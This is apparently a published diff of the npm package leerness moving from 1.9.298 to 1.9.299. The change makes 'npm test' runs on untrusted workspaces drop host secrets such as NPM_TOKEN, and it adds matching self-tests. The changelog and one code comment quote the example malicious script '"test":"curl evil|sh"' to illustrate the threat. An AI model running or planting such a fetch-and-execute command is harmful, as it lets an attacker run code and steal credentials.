leerness 1.9.298 → 1.9.299

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/CHANGELOG.md CHANGED
@@ -1,5 +1,23 @@
1
1
  # Changelog
2
2
 
3
+ ## 1.9.299 — 2026-06-04 — UR-0039: npm test 시크릿 노출 차단 (외부 AI 리뷰 #2, Opus S-1)
4
+
5
+ **🔒 신뢰 못 할 워크스페이스의 `npm test` 가 호스트 `process.env`(시크릿 전체)를 상속받던 실질 취약점 차단. Opus 4.8 리뷰가 코드 라인 근거로 지적한 high 보안 이슈.**
6
+
7
+ ### 배경 (Opus S-1)
8
+ `verify-claim --run-tests`(9475)와 `reuse --run-tests`(10051)가 `cp.spawnSync('npm test', [], { shell:true })` 를 **env 미지정**으로 호출 → 임의 `package.json` `"test"` 스크립트가 호스트의 모든 환경변수(AWS/OPENAI/ANTHROPIC 키, GITHUB_TOKEN, NPM_TOKEN, LEERNESS_NPM_TOKEN 등)에 접근. 악성 워크스페이스의 `"test":"curl evil|sh"` 가 시크릿 전체를 탈취 가능. `runCommandSafe`(cwd jail + `_scrubEnv`)가 있는데도 우회됨. verify-code(14684)는 runCommandSafe 경유였으나 `_scrubEnv` 가 release 토큰을 통과시켜 test 스크립트에 노출.
9
+
10
+ ### 구현 (UR-0039)
11
+ 1. **`_scrubTestEnv()` 신설** — `_scrubEnv` 결과에서 시크릿 키까지 제거(`_isSecretKey` 단일출처 재사용). `_scrubEnv` 는 release/publish 호환으로 GITHUB_TOKEN/NPM_TOKEN/GH_TOKEN/LEERNESS_*(LEERNESS_NPM_TOKEN 포함) 통과시키나, 임의 test 스크립트엔 전부 제거. PATH 등 실행 필수 키는 유지.
12
+ 2. **`runCommandSafe` `scrubSecrets` 옵션** — true 시 `_scrubTestEnv` 사용(기본은 `_scrubEnv`, release/git 흐름 유지).
13
+ 3. **취약 spawn 전환** — verify-claim --run-tests(9475)/reuse --run-tests(10051)를 `cp.spawnSync` → `runCommandSafe(..., { scrubSecrets:true })`. cwd jail + 시크릿 차단 동시 획득. verify-code(14684)에도 `scrubSecrets:true` 추가.
14
+ 4. selftest 46→47 (`_scrubEnv` 토큰 유지 vs `_scrubTestEnv` 제거 + PATH 유지) · e2e 243→244 (대조군: 스크럽 없이 직접 실행 시 토큰 노출 exit 1 → verify-code 는 스크럽으로 test 통과).
15
+
16
+ ### 검증
17
+ - **selftest 47/47 PASS** · **E2E 244/244 PASS** (회귀 0).
18
+ - 실측: 토큰이 보이면 exit 1 인 test 스크립트가 verify-code(scrubSecrets) 에선 **통과**(스크럽됨), 직접 npm test(대조군)에선 **exit 1**(노출 확인 — 테스트 자체 유효성 검증).
19
+ - `_scrubEnv` 는 NPM_TOKEN 유지(release publish 정상), `_scrubTestEnv` 는 NPM_TOKEN/LEERNESS_NPM_TOKEN 제거 + PATH 유지.
20
+
3
21
  ## 1.9.298 — 2026-06-04 — UR-0038: writeUtf8 원자적 쓰기 (외부 AI 리뷰 3중수렴 #1)
4
22
 
5
23
  **🔒 외부 AI 리뷰 3종(Codex gpt-5.5 · Sonnet 4.8 · Opus 4.8)이 공통 high로 지적한 최우선 신뢰성 이슈 해소 — 모든 상태 파일 쓰기를 원자적(temp→rename)으로 전환해 부분쓰기 손상을 근본 차단. "메모리 항상 보존" 약속을 코드로 보증.**
package/README.md CHANGED
@@ -3,7 +3,7 @@
3
3
  > **AI 코딩 에이전트의 거짓 완료·중복·망각·충돌을 막아주는 검수·기억·협업 CLI 하네스.**
4
4
  > **A CLI harness that stops AI coding agents from faking completion, duplicating work, forgetting context, and colliding.**
5
5
 
6
- [![npm](https://img.shields.io/badge/npm-leerness-blue)](https://www.npmjs.com/package/leerness) [![version](https://img.shields.io/badge/version-1.9.298-green)]() [![tests](https://img.shields.io/badge/e2e-243%2F243-success)]() [![selftest](https://img.shields.io/badge/selftest-46-success)]() [![mcp](https://img.shields.io/badge/MCP--tools-81-brightgreen)]() [![providers](https://img.shields.io/badge/AI_providers-10-brightgreen)]() [![license](https://img.shields.io/badge/license-MIT-lightgrey)]()
6
+ [![npm](https://img.shields.io/badge/npm-leerness-blue)](https://www.npmjs.com/package/leerness) [![version](https://img.shields.io/badge/version-1.9.299-green)]() [![tests](https://img.shields.io/badge/e2e-244%2F244-success)]() [![selftest](https://img.shields.io/badge/selftest-47-success)]() [![mcp](https://img.shields.io/badge/MCP--tools-81-brightgreen)]() [![providers](https://img.shields.io/badge/AI_providers-10-brightgreen)]() [![license](https://img.shields.io/badge/license-MIT-lightgrey)]()
7
7
 
8
8
  ```
9
9
  ╔══════════════════════════════════════════════════════════════╗
@@ -471,7 +471,7 @@ MIT — © leerness contributors
471
471
  <!-- leerness:project-readme:start -->
472
472
  ## Leerness Project Harness
473
473
 
474
- 이 프로젝트는 Leerness v1.9.298 하네스를 사용합니다. AI 에이전트는 작업 전 `leerness handoff`로 컨텍스트를 적재하고, 작업 후 `leerness check`/`leerness audit`/`leerness session close`를 수행해야 합니다.
474
+ 이 프로젝트는 Leerness v1.9.299 하네스를 사용합니다. AI 에이전트는 작업 전 `leerness handoff`로 컨텍스트를 적재하고, 작업 후 `leerness check`/`leerness audit`/`leerness session close`를 수행해야 합니다.
475
475
 
476
476
  ### 정체성 — AI 에이전트 운영 레이어 (UR-0030)
477
477
 
@@ -525,7 +525,7 @@ leerness memory restore decision <date|title>
525
525
 
526
526
  ### MCP server (외부 AI 통합)
527
527
 
528
- Leerness v1.9.298는 stdio JSON-RPC MCP server를 내장합니다 — Claude Code · Cursor · Codex CLI 등 외부 AI에 **81개 도구**를 노출:
528
+ Leerness v1.9.299는 stdio JSON-RPC MCP server를 내장합니다 — Claude Code · Cursor · Codex CLI 등 외부 AI에 **81개 도구**를 노출:
529
529
 
530
530
  ```jsonc
531
531
  // 카테고리별
@@ -546,7 +546,7 @@ Leerness v1.9.298는 stdio JSON-RPC MCP server를 내장합니다 — Claude Cod
546
546
  `<<autonomous-loop-dynamic>>` 신호만 보내면 AI가:
547
547
  1) 다음 라운드 후보 선정 → 2) 코드 변경 → 3) stress-v* 신규 작성 + 누적 회귀 → 4) e2e 219/219 → 5) npm pack + git tag + GitHub release → 6) main 자동 push (1.9.140+) → 7) session close → 8) 다음 라운드 예약.
548
548
 
549
- 현재 누적: **70 라운드 (1.9.40 → 1.9.298)** · 매 라운드 GitHub release/태그 생성 · _reports/는 비공개 보존.
549
+ 현재 누적: **70 라운드 (1.9.40 → 1.9.299)** · 매 라운드 GitHub release/태그 생성 · _reports/는 비공개 보존.
550
550
 
551
551
  ### 성능 가이드 (1.9.140 측정)
552
552
 
@@ -584,6 +584,6 @@ leerness release pack --close --auto-main-push
584
584
  - `.harness/session-handoff.md`: 다음 세션 인수인계 (자동 작성)
585
585
  - `.harness/lessons.md` / `decisions.md` / `rules.md`: 영구 메모리 (5 surface)
586
586
 
587
- Last synced by Leerness v1.9.298: 2026-06-04
587
+ Last synced by Leerness v1.9.299: 2026-06-04
588
588
  <!-- leerness:project-readme:end -->
589
589
 
package/bin/harness.js CHANGED
@@ -12,7 +12,7 @@ const { _isSecretKey, compareVer, parseHarnessVersion, _classifyCJK, _riskLabel,
12
12
  // 1.9.295 (UR-0025 4단계): 정적 데이터 카탈로그 모듈 분리 (비파괴, require-based).
13
13
  const { CAPABILITY_SURFACE, POWERFUL_COMMANDS, ADAPTERS, REUSE_CATEGORIES, REUSE_CHECKLIST } = require('../lib/catalogs');
14
14
 
15
- const VERSION = '1.9.298';
15
+ const VERSION = '1.9.299';
16
16
 
17
17
  // 1.9.290 (UR-0037, Codex gpt-5.5 #4 수렴): CLI 전용 부작용은 require 시 실행하지 않는다.
18
18
  // 이전: warning listener 제거 / NODE_OPTIONS 변경 / chcp IIFE 가 top-level 즉시 실행 → require('harness') 시 호스트 프로세스 오염.
@@ -3034,6 +3034,7 @@ function _selfTestCases() {
3034
3034
  { name: 'about: 정체성 verb(AI 운영 레이어) + MCP leerness_about 등록 (UR-0030 1.9.296)', run: () => { const id = _leernessIdentity(); const src = read(__filename); return typeof aboutCmd === 'function' && /운영 레이어/.test(id.identity) && id.layers.length === 5 && id.surface.mcpTools >= 81 && require('../lib/mcp-tools').some(t => t.name === 'leerness_about') && /case 'leerness_about':/.test(src) && /cmd === 'about' \|\| cmd === 'identity'/.test(src); } },
3035
3035
  { name: 'lib/mcp-tools: MCP 도구 정의 모듈 단일출처 (_mcpToolCount=모듈 length, Codex #5 영구해소) (UR-0025 1.9.297)', run: () => { const T = require('../lib/mcp-tools'); return Array.isArray(T) && T.length >= 81 && T.every(t => t.name && t.description && t.inputSchema) && T[0].name === 'leerness_handoff' && _mcpToolCount() === T.length && !/const TOOLS = \[/.test(read(__filename)); } },
3036
3036
  { name: 'writeUtf8: 원자적 쓰기(temp→rename) 손상방지 (UR-0038 외부리뷰 3중수렴 1.9.298)', run: () => { const src = read(__filename); return /function writeUtf8\(p, s\)/.test(src) && /fs\.writeFileSync\(tmp,/.test(src) && /fs\.renameSync\(tmp, p\)/.test(src) && /\.tmp-\$\{process\.pid\}/.test(src) && /fs\.unlinkSync\(tmp\)/.test(src); } },
3037
+ { name: '_scrubTestEnv: npm test 시크릿 차단(_scrubEnv는 release 토큰 유지) (UR-0039 외부리뷰 1.9.299)', run: () => { const o = { N: process.env.NPM_TOKEN, L: process.env.LEERNESS_NPM_TOKEN }; process.env.NPM_TOKEN = 'sec1'; process.env.LEERNESS_NPM_TOKEN = 'sec2'; const base = _scrubEnv(); const test = _scrubTestEnv(); const r = base.NPM_TOKEN === 'sec1' && base.LEERNESS_NPM_TOKEN === 'sec2' && !test.NPM_TOKEN && !test.LEERNESS_NPM_TOKEN && !!test.PATH; if (o.N === undefined) delete process.env.NPM_TOKEN; else process.env.NPM_TOKEN = o.N; if (o.L === undefined) delete process.env.LEERNESS_NPM_TOKEN; else process.env.LEERNESS_NPM_TOKEN = o.L; return r; } },
3037
3038
  { name: 'VERSION 형식 (x.y.z)', run: () => /^\d+\.\d+\.\d+$/.test(VERSION) }
3038
3039
  ];
3039
3040
  }
@@ -9472,7 +9473,8 @@ function verifyClaimCmd(root, taskId) {
9472
9473
  if (!hasTestScript) {
9473
9474
  runResult = { skipped: true, reason: 'scripts.test 없음' };
9474
9475
  } else {
9475
- const r = cp.spawnSync('npm test', [], { cwd: root, encoding: 'utf8', shell: true, timeout: 5 * 60 * 1000 });
9476
+ // 1.9.299 (UR-0039): 신뢰 워크스페이스 npm test runCommandSafe + scrubSecrets (시크릿 노출 차단 + cwd jail).
9477
+ const r = runCommandSafe('npm test', [], { cwd: root, root, encoding: 'utf8', allowShell: true, scrubSecrets: true, timeout: 5 * 60 * 1000, kind: 'verify_claim_test' });
9476
9478
  const out = (r.stdout || '') + (r.stderr || '');
9477
9479
  // 1.9.20: 파싱 패턴 확장 — 한국어 + jest/mocha/tap/vitest
9478
9480
  let parsed = null;
@@ -10047,7 +10049,8 @@ function depsImpactCmd(root, targetCapability) {
10047
10049
  try { pkg = JSON.parse(read(pkgPath)); } catch {}
10048
10050
  if (!pkg?.scripts?.test) { log(` ⚠ ${projName}: scripts.test 없음 — skip`); continue; }
10049
10051
  const t0 = Date.now();
10050
- const r = cp.spawnSync('npm test', [], { cwd: projPath, encoding: 'utf8', shell: true, timeout: 5 * 60 * 1000 });
10052
+ // 1.9.299 (UR-0039): 영향 프로젝트 npm test runCommandSafe + scrubSecrets (시크릿 노출 차단). root=projPath cwd jail 통과.
10053
+ const r = runCommandSafe('npm test', [], { cwd: projPath, root: projPath, encoding: 'utf8', allowShell: true, scrubSecrets: true, timeout: 5 * 60 * 1000, kind: 'reuse_impact_test' });
10051
10054
  const elapsed = Date.now() - t0;
10052
10055
  const out = (r.stdout || '') + (r.stderr || '');
10053
10056
  const m = out.match(/(\d+)\s*\/\s*(\d+)\s*(?:passed|통과|pass|passing)/i);
@@ -14681,7 +14684,8 @@ function verifyCodeCmd(root) {
14681
14684
  log(`\n## ${t.name}: ${t.cmd}`);
14682
14685
  const start = Date.now();
14683
14686
  // 1.9.150: runCommandSafe — cwd jail + env scrub + observability 자동 (shell:true 유지 — npm/pytest 호환)
14684
- const r = runCommandSafe(t.cmd, [], { cwd: root, root, timeout: 5 * 60 * 1000, allowShell: true, kind: 'verify_code_task', label: `verify-${t.name}` });
14687
+ // 1.9.299 (UR-0039): scrubSecrets 신뢰 워크스페이스 test/build 스크립트에 publish 토큰/시크릿 노출 차단.
14688
+ const r = runCommandSafe(t.cmd, [], { cwd: root, root, timeout: 5 * 60 * 1000, allowShell: true, scrubSecrets: true, kind: 'verify_code_task', label: `verify-${t.name}` });
14685
14689
  const dur = Date.now() - start;
14686
14690
  if (r.status === 0) ok(`${t.name} passed (${dur}ms)`);
14687
14691
  else if (t.optional && r.status === 127) warn(`${t.name} 스킵 (${t.cmd} 없음)`);
@@ -17653,6 +17657,14 @@ function _scrubEnv(extraEnv) {
17653
17657
  }
17654
17658
  return out;
17655
17659
  }
17660
+ // 1.9.299 (UR-0039, 외부리뷰 3중수렴): 신뢰 못 할 워크스페이스 스크립트(npm test 등) 실행용 — _scrubEnv 결과에서 시크릿 키까지 제거.
17661
+ // _scrubEnv 는 release/publish 호환을 위해 GITHUB_TOKEN/NPM_TOKEN/GH_TOKEN/LEERNESS_*(LEERNESS_NPM_TOKEN 포함)를 통과시키나,
17662
+ // 임의 package.json "test" 스크립트(예: "test":"curl evil|sh")엔 토큰 노출 금지. _isSecretKey(단일 출처)로 시크릿 키 일괄 제거.
17663
+ function _scrubTestEnv(extraEnv) {
17664
+ const out = _scrubEnv(extraEnv);
17665
+ for (const k of Object.keys(out)) { if (_isSecretKey(k)) delete out[k]; }
17666
+ return out;
17667
+ }
17656
17668
  function _isCwdSafe(root, cwd) {
17657
17669
  try {
17658
17670
  if (!cwd) return true;
@@ -17702,7 +17714,8 @@ function runCommandSafe(cmd, args, opts) {
17702
17714
  encoding: opts.encoding || 'utf8',
17703
17715
  timeout,
17704
17716
  shell: useShell,
17705
- env: _scrubEnv(opts.env),
17717
+ // 1.9.299 (UR-0039): scrubSecrets=true 시 시크릿 키까지 제거(신뢰 못 할 npm test 실행). 기본은 _scrubEnv(release/publish 토큰 유지).
17718
+ env: opts.scrubSecrets ? _scrubTestEnv(opts.env) : _scrubEnv(opts.env),
17706
17719
  input: opts.input,
17707
17720
  stdio: opts.stdio || 'pipe'
17708
17721
  };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "leerness",
3
- "version": "1.9.298",
3
+ "version": "1.9.299",
4
4
  "description": "Leerness: 비파괴 마이그레이션, 자동 버전 감지·업데이트, 계획/진행/핸드오프 자동화, 게으름·시크릿·인코딩 자동 가드, Claude Code 슬래시 통합을 갖춘 한국어 우선 AI 개발 하네스.",
5
5
  "keywords": [
6
6
  "leerness",
package/scripts/e2e.js CHANGED
@@ -3297,5 +3297,31 @@ total++;
3297
3297
  if (!ok) failed++;
3298
3298
  }
3299
3299
 
3300
+ // 1.9.299 회귀 (UR-0039 외부리뷰): npm test 시크릿 차단 — 토큰이 보이면 exit 1 인 test 스크립트가 verify-code 에서 통과해야(스크럽됨)
3301
+ total++;
3302
+ {
3303
+ let ok = false;
3304
+ try {
3305
+ const secDir = fs.mkdtempSync(path.join(os.tmpdir(), 'leerness-sec-'));
3306
+ // test: NPM_TOKEN/LEERNESS_NPM_TOKEN 가 보이면 exit 1(스크럽 실패), 안 보이면 exit 0
3307
+ fs.writeFileSync(path.join(secDir, 'package.json'), JSON.stringify({
3308
+ name: 'sec', version: '0.0.1',
3309
+ scripts: { test: 'node -e "process.exit(process.env.NPM_TOKEN||process.env.LEERNESS_NPM_TOKEN?1:0)"' }
3310
+ }) + '\n', 'utf8');
3311
+ // 시크릿을 env 에 심고 verify-code 실행 → 스크럽되면 스크립트가 토큰을 못 봐 exit 0(test passed)
3312
+ const r = cp.spawnSync(process.execPath, [CLI, 'verify-code', secDir], {
3313
+ cwd: secDir, encoding: 'utf8', timeout: 60000,
3314
+ env: { ...process.env, NPM_TOKEN: 'leaktok', LEERNESS_NPM_TOKEN: 'leaklz' }
3315
+ });
3316
+ const out = (r.stdout || '') + (r.stderr || '');
3317
+ // 대조군: 같은 스크립트를 스크럽 없이 직접 실행하면 exit 1 (토큰 노출 확인 — 테스트 자체 유효성)
3318
+ const ctrl = cp.spawnSync('npm test', [], { cwd: secDir, shell: true, encoding: 'utf8', timeout: 30000, env: { ...process.env, NPM_TOKEN: 'leaktok' } });
3319
+ ok = /✓ test passed/.test(out) && !/✗ test/.test(out) && ctrl.status === 1;
3320
+ fs.rmSync(secDir, { recursive: true, force: true });
3321
+ } catch {}
3322
+ console.log(ok ? '✓ B(1.9.299) npm test 시크릿 차단: verify-code 가 NPM_TOKEN/LEERNESS_NPM_TOKEN 스크럽 (UR-0039 외부리뷰)' : '✗ npm test 시크릿 차단 실패');
3323
+ if (!ok) failed++;
3324
+ }
3325
+
3300
3326
  console.log(`\nE2E result: ${total - failed}/${total} passed · ${((Date.now() - _e2eStart) / 1000).toFixed(0)}s`);
3301
3327
  if (failed > 0) process.exit(1);